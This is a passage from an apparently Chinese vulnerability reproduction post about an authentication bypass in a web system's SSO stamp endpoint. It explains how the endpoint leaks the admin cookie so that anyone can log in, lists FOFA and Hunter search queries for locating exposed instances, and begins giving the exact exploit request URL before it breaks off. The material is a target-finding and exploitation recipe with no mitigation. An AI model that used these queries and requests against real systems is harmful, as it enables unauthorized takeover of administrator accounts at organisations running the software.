一、漏洞描述
由于/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asm
j接口未作限制,导致可以通过该接口调用admin
的cookie
值,通过对LoginCredence
和LoginTimestamp
的参数修改,进而实现任意登录进去系统.
二、漏洞查询
fofa:fid=”/yV4r5PdARKT4jaqLjJYqw==”
body=”/Services/Identification/Server”
hunter:web.body=”/Services/Identification/Server/“
三、漏洞复现
第一步访问页面
第二步访问接口
http://ip:8888/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx?op=GetStamp
url后拼接/WebService/Lk6SyncService/DirectToOthe